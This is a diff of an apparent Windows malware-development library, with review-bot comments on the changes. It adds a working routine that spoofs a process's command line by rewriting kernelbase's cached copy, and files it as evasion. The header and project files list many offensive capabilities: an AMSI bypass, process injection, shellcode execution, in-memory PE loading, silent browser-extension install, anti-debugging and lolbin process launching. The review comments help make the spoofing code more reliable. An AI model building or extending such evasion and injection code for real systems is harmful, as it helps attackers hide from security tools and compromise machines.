@ -0,0 +1,108 @@
#include "Win32Helper.h"
BOOL RtlSetBaseUnicodeCommandLine(PWCHAR CommandLinePayload)
{
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nt = NULL;
PIMAGE_FILE_HEADER File = NULL;
PIMAGE_OPTIONAL_HEADER Optional = NULL;
HMODULE hKernelBase = NULL;
PBYTE BaseAddress = NULL;
BOOL bFlag = FALSE;
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
PULONG_PTR DataSegment = ERROR_SUCCESS;
DWORD NumberOfPointers = ERROR_SUCCESS;
PWSTR CommandLineString = NULL;
PSTR CommandLineStringA = NULL;
PUNICODE_STRING CommandLineUnicodeString = NULL;
PANSI_STRING CommandLineAnsiString = NULL;
PPEB Peb = GetPeb();
PLDR_MODULE Module = NULL;
hKernelBase = TryLoadDllMultiMethodW((PWCHAR)L"kernelbase.dll");
if (!hKernelBase)
goto EXIT_ROUTINE;
BaseAddress = (PBYTE)hKernelBase;
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &BaseAddress))
goto EXIT_ROUTINE;
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
{
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, ".data") == ERROR_SUCCESS)
{
DataSegment = (PULONG_PTR)(BaseAddress + SectionHeaderArray[dwX].VirtualAddress);
NumberOfPointers = SectionHeaderArray[dwX].Misc.VirtualSize / sizeof(ULONG_PTR);
bFlag = TRUE;
break;
}
}
if (!bFlag)
goto EXIT_ROUTINE;
else
bFlag = FALSE;
CommandLineString = GetCommandLineW();
if (CommandLineString == NULL)
goto EXIT_ROUTINE;
for (DWORD dwX = 0; dwX < NumberOfPointers; dwX++)
{
CommandLineUnicodeString = (PUNICODE_STRING)&DataSegment[dwX];
__try
{
if (StringCompareW(CommandLineUnicodeString->Buffer, CommandLineString) == 0)
{
RtlInitUnicodeString(CommandLineUnicodeString, CommandLinePayload);
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) { continue; }
}
CommandLineStringA = GetCommandLineA();
if (CommandLineStringA == NULL)
goto EXIT_ROUTINE;
for (DWORD dwX = 0; dwX < NumberOfPointers; dwX++)
{
CommandLineAnsiString = (PANSI_STRING)&DataSegment[dwX];
__try
{
if (StringCompareA(CommandLineAnsiString->Buffer, CommandLineStringA) == 0)
{
CHAR ccBuffer[MAX_PATH] = { 0 };
ANSI_STRING AnsiString = { 0 };
if (WCharStringToCharString(ccBuffer, CommandLinePayload, StringLengthW(CommandLinePayload)) == 0)
goto EXIT_ROUTINE;
RtlInitAnsiString(&AnsiString, ccBuffer);
if (CopyMemoryEx(&DataSegment[dwX], &AnsiString, sizeof(ANSI_STRING)) == NULL)
goto EXIT_ROUTINE;
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) { continue; }
}
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
for (DWORD dwX = 0; TRUE; dwX++)
{
Module = (PLDR_MODULE)((PBYTE)Module->InMemoryOrderModuleList.Flink - 16);
if (Module->BaseDllName.Buffer == NULL)
break;
}
bFlag = TRUE;
EXIT_ROUTINE:
return bFlag;
}
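Review bot: In the ANSI loop, `AnsiString.Buffer` is set to `ccBuffer`, an automatic array declared inside the `__try` block, and that ANSI_STRING is then copied into the located `.data` slot with CopyMemoryEx; once this function returns, the stored `Buffer` pointer refers to reused stack memory, so a later GetCommandLineA() caller reads garbage. The storage must outlive the call: `static CHAR ccBuffer[MAX_PATH] = { 0 };` is the one-line fix, or allocate it from the heap and deliberately never free it. The same ownership rule applies to the wide path, where RtlInitUnicodeString points the stored UNICODE_STRING at `CommandLinePayload` itself, so a header comment should state that the caller must keep `CommandLinePayload` alive for the remainder of the process. The final loop over `Peb->LoaderData->InMemoryOrderModuleList` assigns `Module` and `dwX` but uses neither and terminates only on a NULL `BaseDllName.Buffer`, so it is dead code with an unbounded walk; remove it. WCharStringToCharString is also given the source length as `MaximumAllowed` instead of `ccBuffer`'s capacity, so the bound should be `MAX_PATH - 1`.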


@ -30,6 +30,7 @@ VOID CharArrayToByteArrayA(_In_ PCHAR Char, _Inout_ PBYTE Byte, _In_ DWORD Lengt
VOID CharArrayToByteArrayW(_In_ PWCHAR Char, _Inout_ PBYTE Byte, _In_ DWORD Length);
VOID RtlInitUnicodeString(_Inout_ PUNICODE_STRING DestinationString, _In_ PCWSTR SourceString);
VOID RtlInitEmptyUnicodeString(_Inout_ PUNICODE_STRING UnicodeString);
VOID RtlInitAnsiString(_Inout_ PANSI_STRING DestinationString, _In_ PCSTR SourceString);
SIZE_T CharStringToWCharString(_Inout_ PWCHAR Destination, _In_ PCHAR Source, _In_ SIZE_T MaximumAllowed);
SIZE_T WCharStringToCharString(_Inout_ PCHAR Destination, _In_ PWCHAR Source, _In_ SIZE_T MaximumAllowed);
VOID ByteArrayToCharArrayA(_Inout_ PCHAR Destination, _In_ PBYTE Source, _In_ DWORD Length);


@ -157,13 +157,17 @@
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp" />
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp" />
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp" />
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp" />
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp" />
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp" />
<ClCompile Include="CreateProcessFromMSHTML.cpp" />
<ClCompile Include="CreateProcessFromPcwUtil.cpp" />
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp" />
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp" />
<ClCompile Include="CreateProcessFromShell32ShellExecRun.cpp" />
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp" />
<ClCompile Include="CreateProcessFromUrlFileProtocolHandler.cpp" />
<ClCompile Include="CreateProcessFromUrlOpenUrl.cpp" />
<ClCompile Include="CreateProcessFromWmiWin32_Process.cpp" />
<ClCompile Include="CreateProcessFromZipfldrRouteCall.cpp" />
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp" />
<ClCompile Include="CreateProcessWithCfGuard.cpp" />
<ClCompile Include="CreatePseudoRandomInteger.cpp" />
@ -172,17 +176,21 @@
<ClCompile Include="CreateThreadAndWaitForCompletion.cpp" />
<ClCompile Include="CreateWindowsObjectPath.cpp" />
<ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp" />
<ClCompile Include="DeleteDirectoryAndSubDataViaDelNode.cpp" />
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp" />
<ClCompile Include="DnsGetDomainNameIPv4AddressAsString.cpp" />
<ClCompile Include="DnsGetDomainNameIPv4AddressUnsignedLong.cpp" />
<ClCompile Include="ExampleOfUsageOfHardwareBreakpointHookingEngine.cpp" />
<ClCompile Include="ExceptHandlerCallbackRoutine.cpp" />
<ClCompile Include="ExtractFilesFromCabIntoTarget.cpp" />
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
<ClCompile Include="GetCurrentProcessNoForward.cpp" />
<ClCompile Include="GetCurrentThreadNoForward.cpp" />
<ClCompile Include="GetPeSectionSizeInBytes.cpp" />
<ClCompile Include="IeCreateFile.cpp" />
<ClCompile Include="IsPeSection.cpp" />
<ClCompile Include="IsProcessRunningAsAdmin2.cpp" />
<ClCompile Include="LzMaximumCompressBuffer.cpp" />
<ClCompile Include="LzMaximumDecompressBuffer.cpp" />
<ClCompile Include="LzStandardCompressBuffer.cpp" />
@ -259,7 +267,6 @@
<ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
<ClCompile Include="MemoryFindMemory.cpp" />
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFileNoPassword.cpp" />
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
<ClCompile Include="Main.cpp" />
<ClCompile Include="ManualResourceDataFetching.cpp" />
<ClCompile Include="MasqueradePebAsExplorer.cpp" />
@ -322,6 +329,8 @@
<ClCompile Include="ReadDataFromPeSection.cpp" />
<ClCompile Include="RemoveDescriptorEntry.cpp" />
<ClCompile Include="RemoveRegisterDllNotification.cpp" />
<ClCompile Include="RtlInitAnsiString.cpp" />
<ClCompile Include="RtlSetBaseUnicodeCommandLine.cpp" />
<ClCompile Include="SetHardwareBreakpoint.cpp" />
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />
@ -375,6 +384,9 @@
<ItemGroup>
<None Include="..\README.md" />
</ItemGroup>
<ItemGroup>
<Text Include="Notes.txt" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>


@ -58,9 +58,6 @@
<Filter Include="Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions">
<UniqueIdentifier>{6be9adc7-8493-44a7-abce-3ec818469f70}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins">
<UniqueIdentifier>{b688b3fc-f662-4634-b690-f200a79aee37}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\Rad Hardware Breakpoint Hooking Engine">
<UniqueIdentifier>{148b86cd-abe4-43c3-a827-d89b58910722}</UniqueIdentifier>
</Filter>
@ -91,6 +88,12 @@
<Filter Include="Source Files\Windows API Helper Functions\Cryptography Related\Compression\Xpress Huff">
<UniqueIdentifier>{28a8f2b1-755e-465f-b650-13a6f1c191c3}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\Windows API Helper Functions\Process Creation">
<UniqueIdentifier>{97f12dfe-6de4-480c-834c-ea10483eea2d}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\Windows API Helper Functions\File Handling">
<UniqueIdentifier>{b1bb1e2e-db48-4d6e-91a7-213c6e47a46a}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Main.cpp">
@ -99,9 +102,6 @@
<ClCompile Include="StringCopy.cpp">
<Filter>Source Files\String Manipulation</Filter>
</ClCompile>
<ClCompile Include="CaplockString.cpp">
<Filter>Source Files\String Manipulation</Filter>
</ClCompile>
<ClCompile Include="CopyMemoryEx.cpp">
<Filter>Source Files\String Manipulation</Filter>
</ClCompile>
@ -249,9 +249,6 @@
<ClCompile Include="CreateWindowsObjectPath.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
@ -306,15 +303,6 @@
<ClCompile Include="MpfComModifyShortcutTarget.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
<ClCompile Include="CreateProcessWithCfGuard.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="HashFileByMsiFileHashTable.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
</ClCompile>
@ -339,24 +327,12 @@
<ClCompile Include="IsDebuggerPresentEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Antidebug</Filter>
</ClCompile>
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateMd5HashFromFilePath.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="GetOsMajorVersionFromPeb.cpp">
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
</ClCompile>
@ -423,9 +399,6 @@
<ClCompile Include="ShlwapiWCharStringToCharString.cpp">
<Filter>Source Files\String Manipulation\String Conversion</Filter>
</ClCompile>
<ClCompile Include="MpfExecutePeBinaryInMemoryFromByteArray.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
<ClCompile Include="ManualResourceDataFetching.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
@ -468,12 +441,6 @@
<ClCompile Include="IsRegistryKeyValid.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins</Filter>
</ClCompile>
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="HashStringMurmur.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
</ClCompile>
@ -540,12 +507,6 @@
<ClCompile Include="CreatePseudoRandomIntegerFromNtdll.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
</ClCompile>
<ClCompile Include="CreateProcessByWindowsRHotKey.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
</ClCompile>
@ -762,38 +723,107 @@
<ClCompile Include="MpfSceViaSymEnumSourceFiles.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="CopyFileViaSetupCopyFile.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromPcwUtil.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="GetCurrentProcessNoForward.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="GetCurrentThreadNoForward.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
<ClCompile Include="CreateProcessFromUrlOpenUrl.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
<ClCompile Include="CreateProcessWithCfGuard.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromZipfldrRouteCall.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromShell32ShellExecRun.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromUrlFileProtocolHandler.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromPcwUtil.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessByWindowsRHotKey.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
</ClCompile>
<ClCompile Include="CopyFileViaSetupCopyFile.cpp">
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
</ClCompile>
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp">
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
</ClCompile>
<ClCompile Include="MpfExecutePeBinaryInMemoryFromByteArray.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="DeleteDirectoryAndSubDataViaDelNode.cpp">
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
</ClCompile>
<ClCompile Include="IsProcessRunningAsAdmin2.cpp">
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
</ClCompile>
<ClCompile Include="ExtractFilesFromCabIntoTarget.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
</ClCompile>
<ClCompile Include="IeCreateFile.cpp">
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
</ClCompile>
<ClCompile Include="CaplockString.cpp">
<Filter>Source Files\String Manipulation</Filter>
</ClCompile>
<ClCompile Include="RtlInitAnsiString.cpp">
<Filter>Source Files\String Manipulation\Windows Unicode Structure</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromMSHTML.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="RtlSetBaseUnicodeCommandLine.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
<ClCompile Include="CreateProcessFromWmiWin32_Process.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
@ -813,4 +843,7 @@
<ItemGroup>
<None Include="..\README.md" />
</ItemGroup>
<ItemGroup>
<Text Include="Notes.txt" />
</ItemGroup>
</Project>


@ -1,4 +1,7 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>javascript:alert('hello');</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>
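Review bot: The file added here looks like a per-developer `.vcxproj.user` (the `LocalDebuggerCommandArguments` and `DebuggerFlavor` elements under a `Debug|x64` condition are what Visual Studio writes to that file), and such files are normally kept out of version control because each developer's IDE silently overwrites them. Consider dropping it from the tree and adding `*.vcxproj.user` to `.gitignore`. If the debugger argument `javascript:alert('hello');` is intended as a shared example input for the new process-creation entries, it would be better recorded in the project's notes or README, where it is visible to readers rather than hidden in a local debugger setting. The filename itself is not shown on this rendered page, so the file type is inferred from its contents.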


@ -22,9 +22,9 @@
#include <resapi.h>
#include <amsi.h>
#include <SetupAPI.h>
#include <WbemCli.h>
#pragma comment(lib, "wbemuuid.lib")
#pragma comment(lib, "Dnsapi.lib")
#pragma comment(lib, "Iphlpapi.lib")
#pragma comment(lib, "Crypt32.lib")
@ -272,8 +272,6 @@ DWORD MpfComMonitorChromeSessionOnce(VOID);
DWORD MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc(_In_ PBYTE BinaryImage);
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier);
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory);
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory);
@ -330,35 +328,35 @@ BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInByt
/*******************************************
EVASION
*******************************************/
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
BOOL CreateProcessWithCfGuardA(_Inout_ PPROCESS_INFORMATION Pi, _In_ PCHAR Path);
HRESULT CreateProcessFromIHxInteractiveUserW(_In_ PWCHAR UriFile);
HRESULT CreateProcessFromIHxInteractiveUserA(_In_ PCHAR UriFile);
HRESULT CreateProcessFromIHxHelpPaneServerW(_In_ PWCHAR UriFile);
HRESULT CreateProcessFromIHxHelpPaneServerA(_In_ PCHAR UriFile);
BOOL MasqueradePebAsExplorer(VOID);
BOOL CreateFileFromDsCopyFromSharedFileW(_In_ PWCHAR NewFileName, _In_ PWCHAR FileToClone);
BOOL CreateFileFromDsCopyFromSharedFileA(_In_ PCHAR NewFileName, _In_ PCHAR FileToClone);
BOOL DelayedExecutionExecuteOnDisplayOff(VOID);
DWORD CreateProcessFromShellExecuteInExplorerProcessW(_In_ PWCHAR BinaryPath);
DWORD CreateProcessFromShellExecuteInExplorerProcessA(_In_ PCHAR BinaryPath);
DWORD CreateProcessFromIShellDispatchInvokeW(_In_ PWCHAR BinaryPath);
DWORD CreateProcessFromIShellDispatchInvokeA(_In_ PCHAR BinaryPath);
DWORD CreateProcessViaNtCreateUserProcessW(PWCHAR FullBinaryPath);
DWORD CreateProcessViaNtCreateUserProcessA(PCHAR FullBinaryPath);
BOOL RemoveDllFromPebA(_In_ LPCSTR lpModuleName);
BOOL RemoveDllFromPebW(_In_ LPCWSTR lpModuleName);
BOOL HookEngineUnhookHeapFree(_In_ BOOL StartEngine);
BOOL HookEngineRestoreHeapFree(_In_ BOOL ShutdownEngine);
BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key);
BOOL RemoveRegisterDllNotification(VOID);
BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
BOOL CreateProcessWithCfGuardA(_Inout_ PPROCESS_INFORMATION Pi, _In_ PCHAR Path);
HRESULT CreateProcessFromIHxInteractiveUserW(_In_ PWCHAR UriFile);
HRESULT CreateProcessFromIHxInteractiveUserA(_In_ PCHAR UriFile);
HRESULT CreateProcessFromIHxHelpPaneServerW(_In_ PWCHAR UriFile);
HRESULT CreateProcessFromIHxHelpPaneServerA(_In_ PCHAR UriFile);
DWORD CreateProcessFromShellExecuteInExplorerProcessW(_In_ PWCHAR BinaryPath);
DWORD CreateProcessFromShellExecuteInExplorerProcessA(_In_ PCHAR BinaryPath);
DWORD CreateProcessFromIShellDispatchInvokeW(_In_ PWCHAR BinaryPath);
DWORD CreateProcessFromIShellDispatchInvokeA(_In_ PCHAR BinaryPath);
DWORD CreateProcessViaNtCreateUserProcessW(PWCHAR FullBinaryPath);
DWORD CreateProcessViaNtCreateUserProcessA(PCHAR FullBinaryPath);
DWORD CreateProcessByWindowsRHotKeyW(_In_ PWCHAR FullPathToBinary);
DWORD CreateProcessByWindowsRHotKeyA(_In_ PCHAR FullPathToBinary);
DWORD CreateProcessByWindowsRHotKeyExW(_In_ PWCHAR FullPathToBinary);
DWORD CreateProcessByWindowsRHotKeyExA(_In_ PCHAR FullPathToBinary);
BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
@ -369,12 +367,18 @@ BOOL CreateProcessFromINFSectionInstallStringNoCab2A(LPCSTR PathToInfFile, LPCST
BOOL CreateProcessFromINFSectionInstallStringNoCab2W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
BOOL CreateProcessFromIeFrameOpenUrlW(LPCWSTR PathToUrlFile);
BOOL CreateProcessFromIeFrameOpenUrlA(LPCSTR PathToUrlFile);
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection); // <--- not implemented
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection); // <--- not implemented
BOOL CreateProcessFromShdocVwOpenUrlW(LPCWSTR PathToUrlFile);
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile);
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile);
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile);
BOOL CreateProcessFromShell32ShellExecRunW(LPCWSTR PathToFile);
BOOL CreateProcessFromShell32ShellExecRunA(LPCSTR PathToFile);
BOOL CreateProcessFromUrlOpenUrlW(LPCWSTR PathToUrlFile);
BOOL CreateProcessFromUrlOpenUrlA(LPCSTR PathToUrlFile);
BOOL CreateProcessFromUrlFileProtocolHandlerW(LPCWSTR PathToUrlFile);
BOOL CreateProcessFromUrlFileProtocolHandlerA(LPCSTR PathToUrlFile);
BOOL CreateProcessFromZipfldrRouteCallW(LPCWSTR PathToFile);
BOOL CreateProcessFromZipfldrRouteCallA(LPCSTR PathToFile);
BOOL CreateProcessFromMsHTMLW(LPCWSTR MshtaCommand);
@ -435,3 +439,16 @@ INT __demonstration_WinMain(VOID); //hook sleep
PCHAR GenericShellcodeHelloWorldMessageBoxA(_Out_ PDWORD SizeOfShellcodeInBytes);
PCHAR GenericShellcodeOpenCalcExitThread(_Out_ PDWORD SizeOfShellcodeInBytes);
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(_Out_ PDWORD SizeOfShellcodeInBytes);
